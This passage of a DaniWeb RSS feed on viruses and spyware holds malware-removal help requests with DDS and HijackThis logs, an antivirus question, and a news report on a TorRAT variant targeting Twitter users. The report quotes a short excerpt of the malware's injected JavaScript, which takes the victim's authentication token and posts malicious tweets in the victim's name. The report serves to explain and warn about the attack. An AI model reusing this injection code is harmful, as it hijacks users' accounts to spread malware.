S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-3-18 138576]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-4-19 161384]
S3 aswVmm;aswVmm;C:\Windows\System32\drivers\aswVmm.sys [2013-4-1 178624]
S3 Impcd;Impcd;C:\Windows\System32\drivers\Impcd.sys [2010-11-30 158976]
S3 LVRS64;Logitech RightSound Filter Driver;C:\Windows\System32\drivers\lvrs64.sys [2012-1-18 351136]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2011-7-1 59392]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-7-9 52736]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2010-12-26 1255736]
.
=============== Created Last 30 ================
.
2013-05-18 01:41:36 --------    d-----w-    C:\Users\Vincent\AppData\Roaming\Malwarebytes
2013-05-18 01:41:27 --------    d-----w-    C:\ProgramData\Malwarebytes
2013-05-18 01:41:26 25928   ----a-w-    C:\Windows\System32\drivers\mbam.sys
2013-05-18 01:41:26 --------    d-----w-    C:\Program Files (x86)\Malwarebytes' Anti-Malware
2013-05-18 01:41:05 --------    d-----w-    C:\Users\Vincent\AppData\Local\Programs
2013-05-17 23:16:26 --------    d-----w-    C:\Program Files (x86)\Free Window Registry Repair
2013-05-17 23:15:02 388096  ----a-r-    C:\Users\Vincent\AppData\Roaming\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2013-05-17 23:15:01 --------    d-----w-    C:\Program Files (x86)\Trend Micro
2013-05-17 19:12:14 --------    d-----r-    C:\Program Files (x86)\Skype
2013-05-17 16:02:11 9460464 ----a-w-    C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{F70E6934-0AF8-479E-A557-6A665C951823}\mpengine.dll
2013-05-15 08:00:59 1767424 ----a-w-    C:\Windows\SysWow64\wininet.dll
2013-05-15 08:00:57 2242048 ----a-w-    C:\Windows\System32\wininet.dll
2013-05-07 08:03:22 9728    ---ha-w-    C:\Windows\SysWow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2013-05-04 21:31:56 737072  ----a-w-    C:\ProgramData\Microsoft\eHome\Packages\SportsV2\SportsTemplateCore\Microsoft.MediaCenter.Sports.UI.dll
2013-05-04 21:31:36 2876528 ----a-w-    C:\ProgramData\Microsoft\eHome\Packages\MCEClientUX\UpdateableMarkup\markup.dll
2013-05-04 21:31:08 42776   ----a-w-    C:\ProgramData\Microsoft\eHome\Packages\MCEClientUX\dSM\StartResources.dll
2013-05-04 21:30:59 539984  ----a-w-    C:\ProgramData\Microsoft\eHome\Packages\MCESpotlight\MCESpotlight\SpotlightResources.dll
2013-05-02 00:35:14 --------    d-----w-    C:\Users\Vincent\AppData\Roaming\.minecraft
2013-04-28 00:10:28 --------    d-----w-    C:\Program Files (x86)\AirPort
2013-04-23 22:06:10 1656680 ----a-w-    C:\Windows\System32\drivers\ntfs.sys
.
==================== Find3M  ====================
.
2013-05-15 05:05:10 71048   ----a-w-    C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2013-05-15 05:05:10 692104  ----a-w-    C:\Windows\SysWow64\FlashPlayerApp.exe
2013-05-07 08:03:22 9728    ---ha-w-    C:\Windows\System32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2013-05-05 22:36:15 545200  ----a-w-    C:\Windows\System32\npdeployJava1.dll
2013-05-05 22:36:15 526768  ----a-w-    C:\Windows\System32\deployJava1.dll
2013-05-02 07:06:08 278800  ------w-    C:\Windows\System32\MpSigStub.exe
2013-04-13 05:49:23 135168  ----a-w-    C:\Windows\apppatch\AppPatch64\AcXtrnal.dll
2013-04-13 05:49:19 350208  ----a-w-    C:\Windows\apppatch\AppPatch64\AcLayers.dll
2013-04-13 05:49:19 308736  ----a-w-    C:\Windows\apppatch\AppPatch64\AcGenral.dll
2013-04-13 05:49:19 111104  ----a-w-    C:\Windows\apppatch\AppPatch64\acspecfc.dll
2013-04-13 04:45:16 474624  ----a-w-    C:\Windows\apppatch\AcSpecfc.dll
2013-04-13 04:45:15 2176512 ----a-w-    C:\Windows\apppatch\AcGenral.dll
2013-04-10 06:01:54 265064  ----a-w-    C:\Windows\System32\drivers\dxgmms1.sys
2013-04-10 06:01:53 983400  ----a-w-    C:\Windows\System32\drivers\dxgkrnl.sys
2013-04-10 03:30:50 3153920 ----a-w-    C:\Windows\System32\win32k.sys
2013-04-08 22:00:05 796672  ----a-w-    C:\Windows\GPInstall.exe
2013-04-05 06:50:36 3958784 ----a-w-    C:\Windows\System32\jscript9.dll
2013-04-05 06:50:31 67072   ----a-w-    C:\Windows\System32\iesetup.dll
2013-04-05 06:50:31 136704  ----a-w-    C:\Windows\System32\iesysprep.dll
2013-04-05 05:26:26 2877440 ----a-w-    C:\Windows\SysWow64\jscript9.dll
2013-04-05 05:26:21 61440   ----a-w-    C:\Windows\SysWow64\iesetup.dll
2013-04-05 05:26:21 109056  ----a-w-    C:\Windows\SysWow64\iesysprep.dll
2013-04-05 04:43:00 2706432 ----a-w-    C:\Windows\System32\mshtml.tlb
2013-04-05 04:29:45 2706432 ----a-w-    C:\Windows\SysWow64\mshtml.tlb
2013-04-05 03:51:11 89600   ----a-w-    C:\Windows\System32\RegisterIEPKEYs.exe
2013-04-05 03:38:25 71680   ----a-w-    C:\Windows\SysWow64\RegisterIEPKEYs.exe
2013-03-19 06:04:06 5550424 ----a-w-    C:\Windows\System32\ntoskrnl.exe
2013-03-19 05:53:58 48640   ----a-w-    C:\Windows\System32\wwanprotdim.dll
2013-03-19 05:53:58 230400  ----a-w-    C:\Windows\System32\wwansvc.dll
2013-03-19 05:46:56 43520   ----a-w-    C:\Windows\System32\csrsrv.dll
2013-03-19 05:04:13 3968856 ----a-w-    C:\Windows\SysWow64\ntkrnlpa.exe
2013-03-19 05:04:10 3913560 ----a-w-    C:\Windows\SysWow64\ntoskrnl.exe
2013-03-19 04:47:50 6656    ----a-w-    C:\Windows\SysWow64\apisetschema.dll
2013-03-19 03:06:33 112640  ----a-w-    C:\Windows\System32\smss.exe
2013-03-06 22:33:21 70992   ----a-w-    C:\Windows\System32\drivers\aswRdr2.sys
2013-03-06 22:33:21 65336   ----a-w-    C:\Windows\System32\drivers\aswRvrt.sys
2013-03-06 22:33:21 178624  ----a-w-    C:\Windows\System32\drivers\aswVmm.sys
2013-03-06 22:33:21 1025808 ----a-w-    C:\Windows\System32\drivers\aswSnx.sys
2013-03-06 22:33:20 80816   ----a-w-    C:\Windows\System32\drivers\aswMonFlt.sys
2013-03-06 22:32:51 41664   ----a-w-    C:\Windows\avastSS.scr
2013-03-06 09:31:21 477616  ----a-w-    C:\Windows\SysWow64\npdeployJava1.dll
2013-03-06 09:31:21 473520  ----a-w-    C:\Windows\SysWow64\deployJava1.dll
2013-02-27 06:02:44 111448  ----a-w-    C:\Windows\System32\consent.exe
2013-02-27 05:48:00 1930752 ----a-w-    C:\Windows\System32\authui.dll
2013-02-27 05:47:10 70144   ----a-w-    C:\Windows\System32\appinfo.dll
2013-02-27 04:49:24 1796096 ----a-w-    C:\Windows\SysWow64\authui.dll
.
============= FINISH: 21:44:46.59 ===============



======= attach.txt ========

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP &amp; ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Home Premium 
Boot Device: \Device\HarddiskVolume2
Install Date: 12/12/2010 12:52:02 PM
System Uptime: 5/17/2013 9:35:16 PM (0 hours ago)
.
Motherboard: Dell Inc. |  | 0C2KJT
Processor: Intel(R) Core(TM) i3 CPU         550  @ 3.20GHz | CPU 1 | 3200/133mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 923 GiB total, 865.713 GiB free.
D: is CDROM ()
E: is Removable
F: is Removable
G: is Removable
H: is Removable
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP527: 5/10/2013 3:00:11 AM - Windows Update
RP528: 5/11/2013 3:00:11 AM - Windows Update
RP529: 5/12/2013 3:00:16 AM - Windows Update
RP530: 5/13/2013 3:00:11 AM - Windows Update
RP531: 5/14/2013 3:00:11 AM - Windows Update
RP532: 5/15/2013 3:00:13 AM - Windows Update
RP533: 5/16/2013 3:00:12 AM - Windows Update
RP534: 5/17/2013 3:00:11 AM - Windows Update
RP535: 5/17/2013 2:20:56 PM - Windows Update
RP536: 5/17/2013 3:23:57 PM - Windows Update
RP537: 5/17/2013 3:48:22 PM - Windows Update
RP538: 5/17/2013 5:42:17 PM - Windows Update
RP539: 5/17/2013 6:14:45 PM - Installed HiJackThis
RP540: 5/17/2013 6:38:56 PM - Removed TheSkyX First Light Edition.
RP541: 5/17/2013 6:39:54 PM - Removed TONKA Search &amp; Rescue 2
.
==== Installed Programs ======================
.
4 Elements
Acer eDisplay Management
Adobe AIR
Adobe Flash Player 11 ActiveX
Adobe Flash Player 11 Plugin
Adobe Reader XI (11.0.03)
Adobe Shockwave Player 12.0
AirPort
Apple Application Support
Apple Mobile Device Support
Apple Software Update
avast! Free Antivirus
Bonjour
CameraHelperMsi
Chicken Invaders 3
Compatibility Pack for the 2007 Office system
D3DX10
Dell Dock
Dell Edoc Viewer
Dell Support Center
Dora's Big Birthday Adventure
Dora Saves the Crystal Kingdom!
erLT
Google Chrome
HiJackThis
Intel(R) Graphics Media Accelerator Driver
iTunes
Java(TM) 6 Update 45 (64-bit)
Junk Mail filter update
Kidzui
KONICA MINOLTA magicolor 1600W
Logitech Vid HD
Logitech Webcam Software
LWS Facebook
LWS Gallery
LWS Help_main
LWS Launcher
LWS Motion Detection
LWS Pictures And Video
LWS Twitter
LWS Video Mask Maker
LWS VideoEffects
LWS Webcam Software
LWS WLM Plugin
LWS YouTube Plugin
Malwarebytes Anti-Malware version 1.75.0.1300
Microsoft .NET Framework 4 Client Profile
Microsoft Application Error Reporting
Microsoft Mouse and Keyboard Center
Microsoft Office PowerPoint Viewer 2007 (English)
Microsoft Silverlight
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft Virtual PC 2007 SP1
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319
Microsoft Works
MSVCRT
MSVCRT_amd64
Multimedia Card Reader
Panel Utility
Pivot Pro Plugin
PowerDVD DX
QuickTime
Realtek High Definition Audio Driver
ROBLOX Player for Vincent
ROBLOX Studio 2013 for Vincent
Roxio Burn
Safari
SDK
Secunia PSI (2.0.0.3001)
Security Update for CAPICOM (KB931906)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2160841)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2446708)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2478663)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2518870)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2539636)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2572078)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2633870)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368v2)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2686827)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2729449)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2737019)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2742595)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2789642)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2804576)
Skype™ 6.3
SpongeBob and the Clash of Triton
swMSM
Unreal Tournament
Update for Microsoft .NET Framework 4 Client Profile (KB2468871)
Update for Microsoft .NET Framework 4 Client Profile (KB2473228)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217)
Windows 7 Upgrade Advisor
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Language Selector
Windows Live Mail
Windows Live Messenger
Windows Live MIME IFilter
Windows Live Movie Maker
Windows Live Photo Common
Windows Live Photo Gallery
Windows Live PIMT Platform
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live Sync
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
.
==== Event Viewer Messages From Past Week ========
.
5/17/2013 9:35:37 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x0000009f (0x0000000000000004, 0x0000000000000258, 0xfffffa800543f040, 0xfffff80000b9c510). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 051713-17643-01.
5/17/2013 5:53:18 PM, Error: Service Control Manager [7001]  - The Computer Browser service depends on the Server service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 5:51:26 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server: {9E175B6D-F52A-11D8-B9A5-505054503030}
5/17/2013 5:51:26 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server: {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
5/17/2013 5:51:24 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service EventSystem with arguments "" in order to run the server: {1BE1F766-5536-11D1-B726-00C04FB926AF}
5/17/2013 5:51:17 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "" in order to run the server: {DD522ACC-F821-461A-A407-50B198B896DC}
5/17/2013 5:51:12 PM, Error: Service Control Manager [7026]  - The following boot-start or system-start driver(s) failed to load:  aswSnx aswSP aswTdi discache SASDIFSV SASKUTIL spldr vmm Wanarpv6
5/17/2013 5:44:18 PM, Error: Microsoft-Windows-WindowsUpdateClient [20]  - Installation Failure: Windows failed to install the following update with error 0x8024200d: Security Update for Windows 7 for x64-based Systems (KB2667402).
5/17/2013 4:29:27 PM, Error: Service Control Manager [7001]  - The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 4:28:02 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1068" attempting to start the service netprofm with arguments "" in order to run the server: {A47979D2-C419-11D9-A5B4-001185AD2B89}
5/17/2013 4:28:02 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1068" attempting to start the service netman with arguments "" in order to run the server: {BA126AD1-2166-11D1-B1D0-00805FC1270E}
5/17/2013 4:27:49 PM, Error: Service Control Manager [7026]  - The following boot-start or system-start driver(s) failed to load:  AFD aswRdr aswSnx aswSP aswTdi DfsC discache NetBIOS NetBT nsiproxy Psched rdbss SASDIFSV SASKUTIL spldr tdx vmm Wanarpv6 WfpLwf
5/17/2013 4:27:49 PM, Error: Service Control Manager [7001]  - The SMB MiniRedirector Wrapper and Engine service depends on the Redirected Buffering Sub Sysytem service which failed to start because of the following error:  A device attached to the system is not functioning.
5/17/2013 4:27:49 PM, Error: Service Control Manager [7001]  - The SMB 2.0 MiniRedirector service depends on the SMB MiniRedirector Wrapper and Engine service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 4:27:49 PM, Error: Service Control Manager [7001]  - The SMB 1.x MiniRedirector service depends on the SMB MiniRedirector Wrapper and Engine service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 4:27:49 PM, Error: Service Control Manager [7001]  - The Network Location Awareness service depends on the Network Store Interface Service service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 4:27:49 PM, Error: Service Control Manager [7001]  - The IP Helper service depends on the Network Store Interface Service service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 4:27:48 PM, Error: Service Control Manager [7001]  - The Workstation service depends on the Network Store Interface Service service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 4:27:48 PM, Error: Service Control Manager [7001]  - The TCP/IP NetBIOS Helper service depends on the Ancillary Function Driver for Winsock service which failed to start because of the following error:  A device attached to the system is not functioning.
5/17/2013 4:27:48 PM, Error: Service Control Manager [7001]  - The Network Store Interface Service service depends on the NSI proxy service driver. service which failed to start because of the following error:  A device attached to the system is not functioning.
5/17/2013 4:27:48 PM, Error: Service Control Manager [7001]  - The DNS Client service depends on the NetIO Legacy TDI Support Driver service which failed to start because of the following error:  A device attached to the system is not functioning.
5/17/2013 4:27:48 PM, Error: Service Control Manager [7001]  - The DHCP Client service depends on the Ancillary Function Driver for Winsock service which failed to start because of the following error:  A device attached to the system is not functioning.
.
==== End Of File ==========================='
</code></pre>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>slwf</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454849/vundo-and-maybe-other-issues</guid>
		</item>
				<item>
			<title>Needed Help About Antivirus Service</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454319/needed-help-about-antivirus-service</link>
			<pubDate>Fri, 10 May 2013 10:56:22 +0000</pubDate>
			<description>Hello guys, I want to know which antivirus gives the best &quot;Antivirus Service&quot; to its users for protecting data from virus and malware attacks, and also which antivirus is good to use at the present time. Thanks in advance.</description>
			<content:encoded><![CDATA[ <p>Hello guys, I want to know which antivirus gives the best "Antivirus Service" to its users for protecting data from virus and malware attacks, and also which antivirus is good to use at the present time. Thanks in advance.</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>alexalbert</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454319/needed-help-about-antivirus-service</guid>
		</item>
				<item>
			<title>Javascript Twitter injection launches Man-in-the-Browser attacks</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/453999/javascript-twitter-injection-launches-man-in-the-browser-attacks</link>
			<pubDate>Mon, 06 May 2013 09:50:53 +0000</pubDate>
			<description>Dana Tamir, Enterprise Security Director for [Trusteer](http://www.trusteer.com/) has recently uncovered a variation of the TorRAT banking data malware which has been actively configured to target Twitter users. The attack works by &quot;injecting Javascript code into the victim’s Twitter account page&quot; Tamir says, adding that the malware &quot;collects the user’s authentication ...</description>
			<content:encoded><![CDATA[ <p>Dana Tamir, Enterprise Security Director for <a href="http://www.trusteer.com/" rel="nofollow">Trusteer</a>, has recently uncovered a variation of the TorRAT banking data malware which has been actively configured to target Twitter users. The attack works by "injecting Javascript code into the victim’s Twitter account page", Tamir says, adding that the malware "collects the user’s authentication token, which enables it to make authorized calls to Twitter's APIs, and then posts new, malicious tweets on behalf of the victim". These tweets are used, of course, to spread the malware within the social networking circle by leveraging the trust that is implicit in such networks. Twitter users, generally speaking, follow people and accounts that they trust. When these accounts are compromised by such an attack, it becomes quite easy to persuade followers to click through to drive-by malware pages, simply courtesy of the level of implied trust invested in the original poster.</p>

<p>At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as "Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris", which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary" and contains a malicious link.<br />
Of course, the attack vector will most likely soon change as other groups adopt the methodology and adapt the code accordingly.</p>

<p>Dana Tamir provided an excerpt from that injected Javascript code to highlight what is being done:</p>

<pre><code>function _PostTweet() {
        var a = $('input[name="authenticity_token"]').val();
        a.length &gt; 0 &amp;&amp; $.post("/i/tweet/create", {
            authenticity_token: a,
            place_id: "",
            status: _GetRndMsg()
        }).always(function () {
            ar[0].msgsent = 1, SetO(), window.location.href = window.location.href
        })
    }
</code></pre>

<p>Trusteer advises that enterprise exploit prevention technology, which prevents vulnerable endpoint user applications (browser clients) from being exploited and malware from being downloaded and executed, is the best way to stop such attacks dead. "External sources like web content and email attachments, which can include a hidden exploit in the form of embedded code, should never be trusted," Trusteer says. "Such content should only be opened while monitoring the application state to ensure it is operating legitimately."</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>happygeek</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/453999/javascript-twitter-injection-launches-man-in-the-browser-attacks</guid>
		</item>
				<item>
			<title>Can&#039;t delete hijacking virus</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/453606/cant-delete-hijacking-virus</link>
			<pubDate>Tue, 30 Apr 2013 01:10:20 +0000</pubDate>
			<description>Hi, I have some hijacking virus that I can't get rid of. I've tried Malwarebytes, tdsskiller, Skybot, AdAware and Superantispyware, cleaned some things, but it persists. Can anyone help? Below is the hijackthis log. Many thanks for any input. Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 9:00:16 PM, ...</description>
			<content:encoded><![CDATA[ <p>Hi,<br />
I have some hijacking virus that I can't get rid of.  I've tried Malwarebytes, tdsskiller, Skybot, AdAware and Superantispyware, cleaned some things, but it persists.  Can anyone help?  Below is the hijackthis log.  Many thanks for any input.</p>

<pre><code>Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 9:00:16 PM, on 4/29/2013
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\PROGRA~1\AVG\AVG10\avgchsvx.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ICO.EXE
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\WINDOWS\system32\FSRremoS.EXE
C:\Program Files\ThinkVantage\AMSG\Amsg.exe
C:\PROGRA~1\THINKV~1\PrdCtr\LPMGR.exe
C:\WINDOWS\System32\DLA\DLACTRLW.EXE
C:\Program Files\Lenovo\AwayTask\AwaySch.EXE
C:\Program Files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe
C:\Program Files\Lenovo\SafeGuard PrivateDisk\pdservice.exe
C:\Program Files\Lenovo\Client Security Solution\cssauth.exe
C:\Program Files\PowerISO\PWRISOVM.EXE
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Analog Devices\SoundMAX\Smax4.exe
C:\Program Files\AVG\AVG10\avgtray.exe
C:\WINDOWS\system32\IPSSVC.EXE
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
C:\Program Files\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\AVG\AVG10\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\McAfee Security Scan\3.0.207\SSScheduler.exe
C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
C:\Program Files\Java\jre7\bin\jqs.exe
C:\Program Files\AVG\AVG10\Identity Protection\agent\bin\avgidsmonitor.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\AVG\AVG10\avgnsx.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqSTE08.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
C:\Program Files\TomTom HOME 2\TomTomHOMEService.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\14.2.0\ToolbarUpdater.exe
C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe
C:\Program Files\Common Files\Pure Networks Shared\Platform\nmsrvc.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqnrs08.exe
C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe
C:\Program Files\Common Files\Java\Java Update\jucheck.exe
C:\Program Files\iCamSource\iCamSource.exe
C:\PROGRA~1\AVG\AVG10\avgrsx.exe
C:\Program Files\AVG\AVG10\avgcsrvx.exe
C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\mstsc.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Mozilla Firefox\plugin-container.exe
C:\Documents and Settings\Paul\My Documents\Downloads\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = <a href="http://feed.snap.do/?publisher=SnapdoEMon&amp;dpid=SnapdoEMon&amp;co=US&amp;userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&amp;searchtype=ds&amp;q=%7BsearchTerms%7D" rel="nofollow">http://feed.snap.do/?publisher=SnapdoEMon&amp;dpid=SnapdoEMon&amp;co=US&amp;userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&amp;searchtype=ds&amp;q={searchTerms}</a>
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = <a href="http://feed.snap.do/?publisher=SnapdoEMon&amp;dpid=SnapdoEMon&amp;co=US&amp;userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&amp;searchtype=ds&amp;q=%7BsearchTerms%7D" rel="nofollow">http://feed.snap.do/?publisher=SnapdoEMon&amp;dpid=SnapdoEMon&amp;co=US&amp;userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&amp;searchtype=ds&amp;q={searchTerms}</a>
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = <a href="http://feed.snap.do/?publisher=SnapdoEMon&amp;dpid=SnapdoEMon&amp;co=US&amp;userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&amp;searchtype=hp" rel="nofollow">http://feed.snap.do/?publisher=SnapdoEMon&amp;dpid=SnapdoEMon&amp;co=US&amp;userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&amp;searchtype=hp</a>
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = <a href="http://go.microsoft.com/fwlink/?LinkId=69157" rel="nofollow">http://go.microsoft.com/fwlink/?LinkId=69157</a>
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = <a href="http://go.microsoft.com/fwlink/?LinkId=54896" rel="nofollow">http://go.microsoft.com/fwlink/?LinkId=54896</a>
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = <a href="http://go.microsoft.com/fwlink/?LinkId=54896" rel="nofollow">http://go.microsoft.com/fwlink/?LinkId=54896</a>
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = <a href="http://go.microsoft.com/fwlink/?LinkId=69157" rel="nofollow">http://go.microsoft.com/fwlink/?LinkId=69157</a>
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = <a href="http://feed.snap.do/?publisher=SnapdoEMon&amp;dpid=SnapdoEMon&amp;co=US&amp;userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&amp;searchtype=ds&amp;q=%7BsearchTerms%7D" rel="nofollow">http://feed.snap.do/?publisher=SnapdoEMon&amp;dpid=SnapdoEMon&amp;co=US&amp;userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&amp;searchtype=ds&amp;q={searchTerms}</a>
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = <a href="http://feed.snap.do/?publisher=SnapdoEMon&amp;dpid=SnapdoEMon&amp;co=US&amp;userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&amp;searchtype=ds&amp;q=%7BsearchTerms%7D" rel="nofollow">http://feed.snap.do/?publisher=SnapdoEMon&amp;dpid=SnapdoEMon&amp;co=US&amp;userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&amp;searchtype=ds&amp;q={searchTerms}</a>
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
